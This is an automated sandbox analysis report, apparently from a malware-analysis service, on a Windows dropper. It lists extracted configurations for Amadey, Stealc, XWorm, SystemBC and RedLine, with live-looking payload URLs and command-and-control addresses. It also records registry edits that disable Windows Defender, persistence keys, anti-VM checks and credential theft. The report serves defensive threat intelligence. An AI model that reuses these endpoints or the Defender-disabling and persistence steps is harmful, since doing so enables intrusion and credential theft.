Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 18:28
Static task
static1
Behavioral task
behavioral1
Sample
c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
Resource
win10v2004-20250217-en
General
-
Target
c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
-
Size
5.5MB
-
MD5
adbdacaaa99af43ad5e4bfb84c2695b3
-
SHA1
3356d266532067786bc20048346c5ccc5c26680b
-
SHA256
c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670
-
SHA512
a123879d0ba85b72b6965859aa08c2c6e6439f501ca7541beb89d5d13c19a774a1af370125c232dfb02d981ef7f10ca35460fe8aad0e11c80b1d4140ce6418aa
-
SSDEEP
98304:0z/V1YLUtSRelU4RPYUH3DgsFNaPfLhzVrdh7dd+lKNJEmdY:g/TJtSkvHnkHR7hxddNJLdY
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000d000000023da6-1408.dat family_xworm behavioral1/memory/1168-1420-0x00000000004B0000-0x00000000004C0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/6604-4340-0x0000000000D60000-0x00000000011B4000-memory.dmp healer behavioral1/memory/6604-4342-0x0000000000D60000-0x00000000011B4000-memory.dmp healer behavioral1/memory/6604-4513-0x0000000000D60000-0x00000000011B4000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/6656-4573-0x0000000000780000-0x0000000000BF8000-memory.dmp family_sectoprat behavioral1/memory/6656-4574-0x0000000000780000-0x0000000000BF8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Xworm family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF fc1506d9ee.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eee113fe4f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1M25d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3H13t.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c1447ebef.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fc1506d9ee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5f6e285793.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ af1884c123.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b1895.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 59cc904836.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4816cf3cfa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gsfeqdc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 127efd171a.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 277 7028 powershell.exe 281 7028 powershell.exe 290 7028 powershell.exe 293 7028 powershell.exe 301 7028 powershell.exe 307 7028 powershell.exe 311 7028 powershell.exe 313 7028 powershell.exe 318 7028 powershell.exe 324 7028 powershell.exe 335 7028 powershell.exe 345 7028 powershell.exe 348 7028 powershell.exe 349 7028 powershell.exe 350 7028 powershell.exe 351 7028 powershell.exe 352 7028 powershell.exe 353 7028 powershell.exe 354 7028 powershell.exe 355 7028 powershell.exe 363 7028 powershell.exe 364 7028 powershell.exe 365 7028 powershell.exe 366 7028 powershell.exe 367 7028 powershell.exe 368 7028 powershell.exe 369 7028 powershell.exe 371 7028 powershell.exe 374 7028 powershell.exe 375 7028 powershell.exe 377 7028 powershell.exe 387 7028 powershell.exe 393 7028 powershell.exe 398 7028 powershell.exe 413 7028 powershell.exe 416 7028 powershell.exe 420 7028 powershell.exe 426 7028 powershell.exe 429 7028 powershell.exe 432 7028 powershell.exe 447 7028 powershell.exe 456 7028 powershell.exe 467 7028 powershell.exe 478 7028 powershell.exe 480 7028 powershell.exe 485 7028 powershell.exe 488 7028 powershell.exe 489 7028 powershell.exe 490 7028 powershell.exe 497 7028 powershell.exe 499 7028 powershell.exe 501 7028 powershell.exe 502 5076 powershell.exe 504 7028 powershell.exe 506 7028 powershell.exe 507 7028 powershell.exe 508 7028 powershell.exe 509 7028 powershell.exe 510 7028 powershell.exe 513 7028 powershell.exe 514 5076 powershell.exe 516 7028 powershell.exe 517 7028 powershell.exe 518 7028 powershell.exe -
pid Process 6428 powershell.exe 5836 powershell.exe 5156 powershell.exe 6160 powershell.exe 5328 powershell.exe 5076 powershell.exe 5076 powershell.exe -
Detects GOST tunneling tool 1 IoCs
A simple tunneling tool written in Golang
resource yara_rule behavioral1/files/0x000d00000001e08c-113.dat Gost -
Downloads MZ/PE file 35 IoCs
flow pid Process 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 35 1544 skotes.exe 135 4344 futors.exe 151 4344 futors.exe 514 5076 powershell.exe 88 3092 3H13t.exe 88 3092 3H13t.exe 88 3092 3H13t.exe 88 3092 3H13t.exe 88 3092 3H13t.exe 88 3092 3H13t.exe 308 5624 BitLockerToGo.exe 498 1544 skotes.exe 115 1544 skotes.exe 147 4344 futors.exe 502 5076 powershell.exe -
Uses browser remote debugging 2 TTPs 13 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5168 chrome.exe 2452 chrome.exe 1080 chrome.exe 384 chrome.exe 1880 chrome.exe 3760 msedge.exe 4952 msedge.exe 4564 msedge.exe 5752 chrome.exe 5716 chrome.exe 4352 chrome.exe 3256 chrome.exe 3956 chrome.exe -
Checks BIOS information in registry 2 TTPs 42 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c1447ebef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 59cc904836.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3H13t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion af1884c123.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gsfeqdc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c1447ebef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 127efd171a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 59cc904836.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1M25d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1M25d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eee113fe4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion af1884c123.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gsfeqdc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 127efd171a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eee113fe4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fc1506d9ee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5f6e285793.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4816cf3cfa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fc1506d9ee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b1895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3H13t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5f6e285793.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4816cf3cfa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b1895.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation 1M25d5.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 62 IoCs
pid Process 1516 x8b75.exe 1924 1M25d5.exe 1544 skotes.exe 4296 2b1895.exe 3092 3H13t.exe 1404 skotes.exe 2044 dzvh4HC.exe 3068 YMci4Rc.exe 1832 YMci4Rc.exe 2264 9aiiMOQ.exe 2952 9aiiMOQ.exe 1560 NL58452.exe 4840 NL58452.exe 4212 NLHQOm0.exe 2508 NLHQOm0.exe 5068 amnew.exe 4344 futors.exe 1560 fher.exe 1048 fher.exe 3004 yOO5EOR.exe 556 0874a5f937.exe 4280 yOO5EOR.exe 4912 DotStealerBuild.exe 1304 YMci4Rc.exe 824 YMci4Rc.exe 5444 af1884c123.exe 6532 9aiiMOQ.exe 6636 9aiiMOQ.exe 1168 C3hYpvm.exe 5736 NLHQOm0.exe 5784 NLHQOm0.exe 5792 NLHQOm0.exe 5964 skotes.exe 6468 futors.exe 6568 3omTNLZ.exe 1204 dzvh4HC.exe 5364 oVpNTUm.exe 5452 NL58452.exe 5584 NL58452.exe 5244 DTQCxXZ.exe 5452 Bjkm5hE.exe 4392 Bjkm5hE.exe 5996 gsfeqdc.exe 5736 7aencsM.exe 6328 7aencsM.exe 5964 7aencsM.exe 6384 7aencsM.exe 3544 d2YQIJa.exe 5744 981724c33f.exe 1280 84e276d43c.exe 5808 cd0ec7b16a.exe 6604 TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE 6644 4c1447ebef.exe 5736 483d2fa8a0d53818306efeb32d3.exe 5224 127efd171a.exe 6068 59cc904836.exe 6600 skotes.exe 6556 futors.exe 6656 eee113fe4f.exe 5096 4816cf3cfa.exe 4348 fc1506d9ee.exe 5516 5f6e285793.exe -
Identifies Wine through registry keys 2 TTPs 21 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 127efd171a.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 3H13t.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 4c1447ebef.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 4816cf3cfa.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 2b1895.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine gsfeqdc.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine eee113fe4f.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine fc1506d9ee.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 5f6e285793.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 1M25d5.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine af1884c123.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 59cc904836.exe -
Loads dropped DLL 3 IoCs
pid Process 3092 3H13t.exe 3092 3H13t.exe 4912 DotStealerBuild.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0874a5f937.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008690101\\0874a5f937.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af1884c123.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008700101\\af1884c123.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cd0ec7b16a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1087771101\\cd0ec7b16a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1087772021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" x8b75.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 148 raw.githubusercontent.com 149 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 154 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000b000000023d85-430.dat autoit_exe behavioral1/files/0x00070000000243bd-4011.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 1924 1M25d5.exe 1544 skotes.exe 4296 2b1895.exe 3092 3H13t.exe 1404 skotes.exe 5444 af1884c123.exe 5964 skotes.exe 6568 3omTNLZ.exe 5364 oVpNTUm.exe 5996 gsfeqdc.exe 3544 d2YQIJa.exe 6604 TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE 6644 4c1447ebef.exe 5736 483d2fa8a0d53818306efeb32d3.exe 5224 127efd171a.exe 6068 59cc904836.exe 6600 skotes.exe 6656 eee113fe4f.exe 5096 4816cf3cfa.exe 4348 fc1506d9ee.exe 5516 5f6e285793.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 3068 set thread context of 1832 3068 YMci4Rc.exe 129 PID 2264 set thread context of 2952 2264 9aiiMOQ.exe 134 PID 1560 set thread context of 4840 1560 NL58452.exe 141 PID 4212 set thread context of 2508 4212 NLHQOm0.exe 145 PID 1560 set thread context of 1048 1560 fher.exe 151 PID 1304 set thread context of 824 1304 YMci4Rc.exe 169 PID 6532 set thread context of 6636 6532 9aiiMOQ.exe 191 PID 5736 set thread context of 5792 5736 NLHQOm0.exe 202 PID 5444 set thread context of 5624 5444 af1884c123.exe 207 PID 5452 set thread context of 5584 5452 NL58452.exe 213 PID 5452 set thread context of 4392 5452 Bjkm5hE.exe 218 PID 5736 set thread context of 6384 5736 7aencsM.exe 225 PID 6644 set thread context of 4384 6644 4c1447ebef.exe 273 PID 5224 set thread context of 5748 5224 127efd171a.exe 278 PID 1280 set thread context of 1252 1280 84e276d43c.exe 280 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1M25d5.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\gsfeqdc.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\gsfeqdc.job oVpNTUm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 4524 3068 WerFault.exe 128 2680 2264 WerFault.exe 133 2268 1560 WerFault.exe 140 3824 4212 WerFault.exe 144 3260 1560 WerFault.exe 150 752 1304 WerFault.exe 166 6764 6532 WerFault.exe 190 4308 5736 WerFault.exe 200 6528 5452 WerFault.exe 212 6648 5452 WerFault.exe 217 3712 5736 WerFault.exe 222 5392 5096 WerFault.exe 279 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0874a5f937.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NLHQOm0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4816cf3cfa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fc1506d9ee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 127efd171a.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0874a5f937.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5f6e285793.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language af1884c123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0874a5f937.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened 